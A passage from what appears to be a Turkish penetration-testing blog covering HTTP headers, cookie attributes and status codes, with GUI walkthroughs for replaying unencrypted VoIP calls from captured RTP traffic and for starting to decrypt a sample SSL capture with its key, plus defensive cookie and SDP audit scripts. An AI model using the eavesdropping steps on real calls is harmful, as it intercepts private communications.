<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">WWW-Authenticate: </strong>Shows the authentication types the server supports (401 code).</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">X-Frame-Options: </strong>Shows the supported frame setting.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">COOKIE Headers</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: black; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cookies</strong> are structures used to make the interaction between the client and the server more secure.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">expires:</strong> Shows the expiry time of a cookie.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">domain:</strong> Shows the domain in which the cookie will be used (fbh.com.tr).</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">path: </strong>Shows the address of the cookies.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">secure: </strong>If this option is used, cookies will be used only on https connections.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HttpOnly: </strong>If this attribute is enabled, access to the cookie from client-side JavaScript code is blocked.</span></div>
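The attributes listed above can be checked mechanically on the Set-Cookie headers an application returns. The following is an added example, not code from the original post: the header values are constructed sample data, the finding names are hypothetical labels, and Max-Age is included as the standard alternative to expires.

```python
# Added example: audit Set-Cookie headers for the attributes described above.
# SAMPLE_HEADERS is constructed sample data, not captured traffic.

SAMPLE_HEADERS = [
    "PHPSESSID=3f9a1c; path=/",
    "auth=eyJhbGciOi; Domain=example.test; Path=/; Secure; HttpOnly; "
    "Expires=Wed, 21 Oct 2026 07:28:00 GMT",
    "lang=tr; Path=/; Secure",
]

# Hypothetical finding labels and what each one means for a reviewer.
FINDINGS = {
    "no-secure": "cookie is also sent over plain HTTP, where it can be read in transit",
    "no-httponly": "cookie is readable from client-side JavaScript",
    "domain-wide": "Domain is set, so the cookie is sent to that domain and all its subdomains",
    "persistent": "expires/Max-Age is set, so the cookie survives a browser restart",
}


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attributes).

    Attribute names are lower-cased because they are case-insensitive;
    flag attributes such as Secure and HttpOnly get an empty string value.
    """
    pieces = [p.strip() for p in header_value.split(";") if p.strip()]
    if not pieces or "=" not in pieces[0]:
        raise ValueError("not a name=value cookie: %r" % header_value)
    name, _, value = pieces[0].partition("=")
    attrs = {}
    for piece in pieces[1:]:
        key, _, val = piece.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def audit_cookie(attrs):
    """Return the list of finding labels for one cookie's attributes."""
    findings = []
    if "secure" not in attrs:
        findings.append("no-secure")
    if "httponly" not in attrs:
        findings.append("no-httponly")
    if attrs.get("domain"):
        findings.append("domain-wide")
    if "expires" in attrs or "max-age" in attrs:
        findings.append("persistent")
    return findings


def audit_headers(headers):
    """Map each cookie name to its findings."""
    report = {}
    for header_value in headers:
        name, _value, attrs = parse_set_cookie(header_value)
        report[name] = audit_cookie(attrs)
    return report


if __name__ == "__main__":
    for cookie_name, labels in audit_headers(SAMPLE_HEADERS).items():
        print(cookie_name)
        for label in labels:
            print("  %-12s %s" % (label, FINDINGS[label]))
```

A session identifier that comes back with "no-secure" or "no-httponly" is the case to fix first; "domain-wide" and "persistent" are informational and depend on how the application is meant to be used.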
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Status Codes</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">The outcome of the response returned from a client-server interaction is expressed with a set of fixed codes.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">1xx:</strong> Indicates informational messages.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">2xx:</strong> Indicates that the request was successful.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">3xx:</strong> Indicates that the request will be redirected to another page.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">4xx:</strong> Indicates client-side errors.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">5xx:</strong> Indicates server-side errors.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">————————————————</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Meanings of Some Status Codes</strong></span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">200:</strong> Indicates that the request was successful and that the body for the request will be sent.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">301:</strong> Indicates that the requested page has been permanently moved or deleted.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">302:</strong> Indicates that the requested page is temporarily unreachable.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">304:</strong> Indicates that the temporarily unreachable page can be reached from the cache.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">400:</strong> Indicates a malformed URL request (for example, a space inside the URL).</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">401: </strong>Indicates that HTTP authentication will be required.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">403:</strong> Indicates that the page cannot be shown for unauthorized requests.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">405:</strong> Indicates that the method cannot be used for the specified URL. This response is returned when we send a request to a page that does not support the PUT method.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">413: </strong>Occurs when the server cannot respond because the body of the requested page is too large.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">414: </strong>Occurs when the server cannot respond because the URL of the requested page is too long.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">500:</strong> The response given by the server because of an unexpected error.</span></div>
<h4 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 18px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee; border: 0px; box-sizing: border-box; color: red; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTPS</span></h4>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">The HTTP protocol transmits data over TCP, and this transmission can easily be viewed by attackers who place themselves in the middle. With HTTPS, the data is encrypted using the SSL protocol before it is transmitted. The integrity and confidentiality of the data are protected. Attackers in the middle can see the traffic but cannot make sense of it. Apart from the secure protocol support, HTTPS and HTTP work the same way.</span></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-67266863171064272962014-11-12T10:18:00.000+02:002014-11-12T10:18:41.319+02:00
Web Application Vulnerability Detection Training with DVWA in 10 Lessons<br />
Friends, in 10 lessons I have tried to explain the vulnerabilities at the <b>low </b>level of the <b>DVWA </b>application.<br />
<br />
I hope it is useful....<br />
<br />
<a href="http://blog.fbh.com.tr/category/dvwa-egitimi/" target="_blank">You can access it here.</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguSJ6bpIhiW05hQmET7_lse-cHMNsJJ3ZMXERZI1cJCtJvvyFxCde9OIiBd5U1XSs9MjW1n9iYc81hJZztDcxoIxEHHBP9JKw5MAjqkCZAHVbMD-o0L2_lZMoclaep_tqzhvTM89AFEsw/s1600/dvwa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguSJ6bpIhiW05hQmET7_lse-cHMNsJJ3ZMXERZI1cJCtJvvyFxCde9OIiBd5U1XSs9MjW1n9iYc81hJZztDcxoIxEHHBP9JKw5MAjqkCZAHVbMD-o0L2_lZMoclaep_tqzhvTM89AFEsw/s400/dvwa.png" width="400" /></a></div>
<br />
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-33174184024205520492014-11-05T14:36:00.001+02:002015-01-20T22:23:40.818+02:00
Listening to VoIP-Based Phones with Wireshark<br />
<b>RTP(Real Time Protocol)</b> is a protocol used in real-time applications. It is used for tasks such as carrying voice over VoIP. When the phones we use inside a company run over VoIP, we communicate over internet lines. So if this phone-call traffic is sniffed, can we turn the captured packets into something meaningful?<br />
<br />
We can make these captured packets meaningful with Wireshark. We can even listen to the phone call.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBMeeprL5kT-Bbbe7mbsLQkrlLxQ1z0hkYY9CP50pFnNOo14faePJW3PvrobMS6jxJyhYTvbDeL9nlavVN4LYGtifyiaW1PpL3wjJaHhLusN8vY6wnV9bJH068hdYxr7rTJI9d1dcZzYQ/s1600/w1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBMeeprL5kT-Bbbe7mbsLQkrlLxQ1z0hkYY9CP50pFnNOo14faePJW3PvrobMS6jxJyhYTvbDeL9nlavVN4LYGtifyiaW1PpL3wjJaHhLusN8vY6wnV9bJH068hdYxr7rTJI9d1dcZzYQ/s1600/w1.PNG" height="175" width="400" /></a></div>
<br />
<a name='more'></a><br />
Above is the traffic we captured. Let's merge all the RTP packets.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoD2Ht4IhBVVEM9330fRVC4bzNSb7MPaCUugOm7Dl0fujpWmP-GWUdeAKI_4ThX8NxM4CWCs4gEQxRam6z0SWZIU8G4qFU2RyO-2cPkR3BfEskjodGRaRMVl9HQPPi-j171oHkhnfVY54/s1600/w2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoD2Ht4IhBVVEM9330fRVC4bzNSb7MPaCUugOm7Dl0fujpWmP-GWUdeAKI_4ThX8NxM4CWCs4gEQxRam6z0SWZIU8G4qFU2RyO-2cPkR3BfEskjodGRaRMVl9HQPPi-j171oHkhnfVY54/s1600/w2.png" height="225" width="400" /></a></div>
<br />
Below, we select one of the merged connections and click Analyze.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF6OLnUOVGMhDwGUxz81oFQGo1VPZLDADNP5XCUtTcFfXe75ET7za5MqcURovS0CwtozfjTMCeK-6_peYRCYk3AKomCT4wEyUpIVvXXgWYWxRrbA-ak8vvPjdZjbX6vlMNfkKPkV22F20/s1600/w3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF6OLnUOVGMhDwGUxz81oFQGo1VPZLDADNP5XCUtTcFfXe75ET7za5MqcURovS0CwtozfjTMCeK-6_peYRCYk3AKomCT4wEyUpIVvXXgWYWxRrbA-ak8vvPjdZjbX6vlMNfkKPkV22F20/s1600/w3.PNG" height="223" width="400" /></a></div>
<br />
Let's listen to the packets.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3_-6ZjqI5kWzKpYw7I4tpXDIpWlEncdQGi51ojoIMpvWZsGoodwewQgDnhW54jNedkzmpC1Jp3A1jPzXyB7KbhQWJDC-t6Ck1o-o8NK3a8a6MwzTbYMOK7EsNhruNij3enaAaDMHUJ0o/s1600/w4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3_-6ZjqI5kWzKpYw7I4tpXDIpWlEncdQGi51ojoIMpvWZsGoodwewQgDnhW54jNedkzmpC1Jp3A1jPzXyB7KbhQWJDC-t6Ck1o-o8NK3a8a6MwzTbYMOK7EsNhruNij3enaAaDMHUJ0o/s1600/w4.PNG" height="286" width="400" /></a></div>
<br />
<br />
The screen that appears looks like the one below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL4OTJiEpPPTtbhqGGwQ2weEQ-3DsRcpw7kIC8aS8t29VpzQeHg_Wiu5kE7566AvXZ39mmzrFb-CSO0dzE-18VtgROb4GtCm_FXqbgzI3Dxk8TJKdVvU22vRFT5BKxc6IZf3KmbBs3MJo/s1600/w5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL4OTJiEpPPTtbhqGGwQ2weEQ-3DsRcpw7kIC8aS8t29VpzQeHg_Wiu5kE7566AvXZ39mmzrFb-CSO0dzE-18VtgROb4GtCm_FXqbgzI3Dxk8TJKdVvU22vRFT5BKxc6IZf3KmbBs3MJo/s1600/w5.PNG" height="63" width="400" /></a></div>
<br />
Let's tick the fields below and start playback.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghXjRt761Bdp2ugeqEYGnblmfWCIbDrHuWs6Y8yIXsZqdaA154UNnTVJxOr3A7eH6xTkgO4vXiZuJvd52Kvc3GGriEq2EOGayeXCrOPuSSncpI6CCt7AnpKqcXdXV8anCnZcYn3qNuwIU/s1600/w6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghXjRt761Bdp2ugeqEYGnblmfWCIbDrHuWs6Y8yIXsZqdaA154UNnTVJxOr3A7eH6xTkgO4vXiZuJvd52Kvc3GGriEq2EOGayeXCrOPuSSncpI6CCt7AnpKqcXdXV8anCnZcYn3qNuwIU/s1600/w6.PNG" height="142" width="400" /></a></div>
<br />
It converted the recorded data into audio. From this we can draw the following conclusion: if VoIP communication traffic can be captured, the calls can be listened to. This is because the VoIP traffic is carried without encryption.<br />
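Whether a call's media is carried as plain RTP or as encrypted SRTP is negotiated in the SDP body of the call signalling, so it can be checked before any audio flows. The following is an added example, not from the original post: it assumes SIP/SDP signalling (which the post does not describe), and both SDP bodies are constructed sample data.

```python
# Added example: flag media streams that an SDP offer negotiates without encryption.
# Both SDP bodies are constructed sample data (addresses from the documentation range).

SAMPLE_SDP_PLAIN = """v=0
o=alice 2890844526 2890844526 IN IP4 192.0.2.10
s=-
c=IN IP4 192.0.2.10
t=0 0
m=audio 49170 RTP/AVP 0 8
a=rtpmap:0 PCMU/8000
a=rtpmap:8 PCMA/8000
"""

SAMPLE_SDP_SRTP = """v=0
o=alice 2890844527 2890844527 IN IP4 192.0.2.10
s=-
c=IN IP4 192.0.2.10
t=0 0
m=audio 49172 RTP/SAVP 0
a=rtpmap:0 PCMU/8000
a=crypto:1 AES_CM_128_HMAC_SHA1_80 inline:CONSTRUCTED_PLACEHOLDER_KEY
"""


def audit_sdp(sdp):
    """Return one dict per m= line: media, port, proto, encrypted, keying.

    The secure profiles (RTP/SAVP, RTP/SAVPF, UDP/TLS/RTP/SAVP, ...) all
    contain "SAVP"; RTP/AVP and RTP/AVPF are plain RTP.
    keying is "sdes" when an a=crypto line carries the key in the SDP itself,
    "dtls" when an a=fingerprint line announces a DTLS-SRTP handshake.
    """
    streams, session_keying, current = [], None, None
    for raw in sdp.splitlines():
        line = raw.strip()
        if line.startswith("m="):
            fields = line[2:].split()
            if len(fields) < 3:
                raise ValueError("malformed m= line: %r" % line)
            proto = fields[2].upper()
            current = {
                "media": fields[0],
                "port": int(fields[1].split("/")[0]),  # "49170/2" style is allowed
                "proto": proto,
                "encrypted": "SAVP" in proto,
                "keying": session_keying,
            }
            streams.append(current)
        elif line.startswith(("a=crypto:", "a=fingerprint:")):
            keying = "sdes" if line.startswith("a=crypto:") else "dtls"
            if current is None:
                session_keying = keying   # session-level attribute
            else:
                current["keying"] = keying
    return streams


def unencrypted_streams(sdp):
    """(media, port) pairs whose audio/video would be readable from a capture."""
    return [(s["media"], s["port"]) for s in audit_sdp(sdp) if not s["encrypted"]]


if __name__ == "__main__":
    for label, body in (("plain", SAMPLE_SDP_PLAIN), ("srtp", SAMPLE_SDP_SRTP)):
        print(label, audit_sdp(body), unencrypted_streams(body))
```

A stream reported with keying "sdes" is encrypted, but its key is carried in the SDP, so the signalling itself has to run over TLS for that to help.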
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-4266077485813786102014-10-24T15:40:00.001+03:002015-01-20T22:23:40.823+02:00
Decrypting SSL Traffic with Wireshark<br />
<span style="background-color: #eeeeee;">In this article I will try to show how, once we have captured network traffic that was encrypted with the SSL protocol, we can decrypt that traffic with the existing SSL key.</span><br />
<span style="background-color: #eeeeee;"> This example can be found in more detail at</span><br />
<span style="background-color: #eeeeee;"><br /></span>
<span style="font-size: x-small;"><a href="http://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=view&target=snakeoil2_070531.tgz" style="background-color: #eeeeee;" target="_blank">http://wiki.wireshark.org/SampleCaptures?action=AttachFile&do=view&target=snakeoil2_070531.tgz </a></span><br />
<span style="background-color: #eeeeee;"><br /></span>
<span style="background-color: #eeeeee;">The archive downloaded from the address above contains a <b>.pcap</b> file with the SSL traffic, a file holding the key, and a file explaining how this procedure is carried out.
</span><br />
<span style="background-color: #eeeeee;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimABeSwh_NDoSXT1tle53arxPM4lXGolS3eOHc99RdXspmNP2dTrOtW8ijKWzbLEUg99_Z2MWE0YzFYAtxkyCR-pocOo8Kkms78KuHLMQC4s5FwgUPXb5FPq1VEIAJQXQGOWqkJCJtAm8/s1600/wi1.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimABeSwh_NDoSXT1tle53arxPM4lXGolS3eOHc99RdXspmNP2dTrOtW8ijKWzbLEUg99_Z2MWE0YzFYAtxkyCR-pocOo8Kkms78KuHLMQC4s5FwgUPXb5FPq1VEIAJQXQGOWqkJCJtAm8/s1600/wi1.PNG" height="47" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Let's open the rsasnakeoil2.pcap file, which contains the traffic, with Wireshark.</span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"></span><br /></span>
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"></span><br /></span>
<br />
<a name='more'></a><span style="background-color: #eeeeee;"><br /></span>
<span style="background-color: #eeeeee;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4wi1qOb6DoT_magsVMsekwEvVcfATq91A8mfuYHsUFDDYKcm_FKvsMBjb6Dr7wBLkEgv-ucdDlVY0A9X6PFEoYO3fT5kQkCGKPJYT9l4rba6b7busg-eCs0HAdBuUrjtM24Z8OgEoC84/s1600/wi2.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4wi1qOb6DoT_magsVMsekwEvVcfATq91A8mfuYHsUFDDYKcm_FKvsMBjb6Dr7wBLkEgv-ucdDlVY0A9X6PFEoYO3fT5kQkCGKPJYT9l4rba6b7busg-eCs0HAdBuUrjtM24Z8OgEoC84/s1600/wi2.PNG" height="157" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: #eeeeee;"><br /></span></div>
<span style="background-color: #eeeeee; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Let's open the settings tab from the Wireshark menus.</span><br />
<span style="background-color: #eeeeee;"><span style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ6EhUHuUCIdZHD0jcdfneEaQxBPTPFWqbByFRB9kaEScQhHBPMmOUFrDKmnDWQgaMTQ8VVD6PhwrSGppINqGEPKTU7vhgOWWZshcu0uQfW-tFxRLVPdH9FBUJasUJqvSv7a5WoHLINAs/s1600/wi3.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ6EhUHuUCIdZHD0jcdfneEaQxBPTPFWqbByFRB9kaEScQhHBPMmOUFrDKmnDWQgaMTQ8VVD6PhwrSGppINqGEPKTU7vhgOWWZshcu0uQfW-tFxRLVPdH9FBUJasUJqvSv7a5WoHLINAs/s1600/wi3.PNG" height="16" width="400" /></a></div>
